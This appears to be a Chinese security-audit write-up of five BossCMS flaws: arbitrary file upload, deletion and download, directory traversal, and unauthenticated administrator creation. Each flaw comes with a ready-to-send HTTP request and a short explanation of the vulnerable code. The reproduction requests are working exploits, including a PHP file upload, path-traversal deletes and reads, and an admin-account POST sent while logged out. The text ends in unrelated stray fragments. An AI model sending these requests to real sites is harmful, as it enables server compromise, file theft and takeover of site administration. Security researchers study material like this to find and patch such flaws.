1、任意文件上傳
限制
復現
POST /system/extend/ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/1.1
Host: bosscms.com
Content-Length: 761
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAsLBZuxNv1g9kBB0
Accept: */*
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/attachment/attachment.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sle15srngo4hspjv2d7ifia6b5
Connection: close------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="name"1.php
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="type"application
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="lastModifiedDate"Wed Jun 07 2023 17:22:54 GMT+0800 (中國標準時間)
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="size"20
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryAsLBZuxNv1g9kBB0--添加允許上傳的類型,上傳php文件不通過
直接通過鏈接形式上傳文件,上傳后會出現訪問地址
代碼
上傳的邏輯值判斷了是否有上傳文件,和上傳文件的大小,并沒有對文件后綴和內容做處理
2、任意文件刪除
限制
POST請求,path=upload
復現
POST /system/extend/ueditor/php/controller.php?action=delete HTTP/1.1
Host: bosscms.com
Content-Length: 17
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/image/image.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: closepath=upload/1.txt
代碼
同文件里有delete函數,判斷以post請求的path參數是否存在并且匹配是否以upload開頭
判斷config中store_type是否為空,如果 不為空的話調用oss類下的delete()方法反之調用dir類下的delete()方法搜索store_type發現該處功能為設置存儲方式,默認為0 。所以 走dir類下的delete()
replace對path進行簡單的替換,沒有涉及到要用的字符,所以可以直接寫入路徑../。if判斷路徑是否有文件,有則直接刪除
3、任意文件下載
限制
mold=safe&part=backup&func=download&id=../../basic/1.txt
復現
GET /admin/?mold=safe&part=backup&func=download&id=../../basic/1.txt HTTP/1.1
Host: bosscms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=safe&part=backup&func=table
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close
代碼
判斷id參數是否存在,存在則拼接sql和路徑賦值給$file.在判斷$file是不是文件,是則返回header,readfile($file);直接讀取這個文件
4、目錄遍歷
限制
action=listfile&folder=../
復現
GET /system/extend/ueditor/php/controller.php?action=listfile&folder=../ HTTP/1.1
Host: bosscms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: */*
Referer: http://bosscms.com/admin/?mold=site&part=site&func=init
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close
代碼
先調用config指向fileManagerActionName(列出文件),在返回listfile函數;在判斷get-start和get-size參數是否存在并且是數字。
在繼續調用lists,接受folder參數調用arrExist函數,判斷數組是否存在,存在就鍵值分離,否則返回空;將結果賦值給$folder;$path = dir::replace($path.'/'.$folder);將$path拼接/和$folder在替換;下面對$path的操作都是read直接讀路徑
通過opendir()、readdir()打開目錄并讀取目錄中的內容
5、未授權添加管理員
限制
mold=manager&part=manager&func=add
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"eeee
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"2
復現
POST /admin/?mold=manager&part=manager&func=add HTTP/1.1
Host: bosscms.com
Content-Length: 395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bosscms.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrrq418NZS9wguXwR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=manager&part=manager&func=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"test
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"2添加管理員抓到數據包,退出登錄發送,添加成功-跳轉到登錄頁面
代碼
以post方式請求,$data為數組賦值,if判斷新密碼和重復的密碼是否相同,if兩次密碼不為空,在if兩次密碼是否相等,相等則向密碼md5賦值給$data[pasword]
如果要觸發alert(保存成功)就不要滿足if..else的條件。首先這里id是不存在的,else要讓username不重復,lecel等級不等于1,就跳出條件語句執行alert(保存成功),從頭到尾都沒有驗證用戶的登錄狀態
這里代碼對username沒有做xss處理也存在xss
 - bus/device/device_driver/class)
)
)
和多頁應用(MPA)的區別)
--雙向DFS+二分查找)
